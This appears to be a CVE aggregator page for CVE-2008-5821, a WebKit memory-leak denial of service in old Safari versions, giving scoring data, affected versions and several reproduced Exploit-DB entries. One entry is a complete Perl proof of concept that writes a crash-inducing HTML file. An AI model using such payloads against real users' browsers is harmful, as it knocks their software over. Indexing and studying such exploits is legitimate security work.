CVE-2008-5821
published 2009-01-02CVE-2008-5821: Memory leak in WebKit.dll in WebKit, as used by Apple Safari 3.2 on Windows Vista SP1, allows remote attackers to cause a denial of service (memory consumption…
PriorityP422medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
3.92%
89.0th percentile
Memory leak in WebKit.dll in WebKit, as used by Apple Safari 3.2 on Windows Vista SP1, allows remote attackers to cause a denial of service (memory consumption and browser crash) via a long ALINK attribute in a BODY element in an HTML document.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | safari | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Apple Safari 4.0.5 (531.22.7) - Denial of Service
exploitdb·2010-04-26
CVE-2008-5821 Apple Safari 4.0.5 (531.22.7) - Denial of Service
Apple Safari 4.0.5 (531.22.7) - Denial of Service
---
#!/usr/bin/perl
# Safari 4.0.5 (531.22.7) Denial of Service
# Exploit Title: [Safari 4.0.5 (531.22.7) Denial of Service]
# Date: [2010-04-26]
# Author: [Xss mAn]
# Software Link: [http://www.apple.com/safari/download/]
# Version: [Safari 4.0.5 (531.22.7)]
# Tested on: [windows 7]
#Gr33t [2] : T-T34M
$headr1="\n\n";
$headr2="\nbody {alink: "."A/" x 13333337 ."}\n";
$headr3="\n";
open(file ,'>>Crash.html');
print file $headr1.$headr2.$headr3;
close(file);
#perl 4 M3N ;)
Exploit-DB
Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (2)
exploitdb·2009-01-01
CVE-2008-5821 Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (2)
Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (2)
---
source: https://www.securityfocus.com/bid/33080/info
Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library.
Remote attackers can exploit this issue to crash the affected browser, denial-of-service condition.
Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected.
Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable.
# -----------------------------------
# Exploit Title: Apple iPhone Safari (body alink) Remote Crash
# Date: 19/12/2010
# Author: Pr0T3cT10n
# Affected Version: IOS 4.0.1
# Tested on Apple iPhone 3, IOS 4.0.1 MobileSafari
# Launch Safari, point your brows
Exploit-DB
Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (1)
exploitdb·2009-01-01
CVE-2008-5821 Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (1)
Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (1)
---
source: https://www.securityfocus.com/bid/33080/info
Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library.
Remote attackers can exploit this issue to crash the affected browser, denial-of-service condition.
Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected.
Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable.
#!/usr/bin/perl
# safari_webkit_ml.pl
# Safari (Webkit) 3.2 Remote Memory Leak Exploit
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# Access violation when writing to [00000018]
# EIP 6B00A02B WebKit.6B00A02B
# LastError 00000008 ERROR_NOT_
No writeups or analysis indexed.
http://jbrownsec.blogspot.com/2008/12/new-year-research-are-upon-us.htmlhttp://packetstormsecurity.org/0812-exploits/safari_webkit_ml.txthttp://www.securityfocus.com/bid/33080https://exchange.xforce.ibmcloud.com/vulnerabilities/47724http://jbrownsec.blogspot.com/2008/12/new-year-research-are-upon-us.htmlhttp://packetstormsecurity.org/0812-exploits/safari_webkit_ml.txthttp://www.securityfocus.com/bid/33080https://exchange.xforce.ibmcloud.com/vulnerabilities/47724
2009-01-02
Published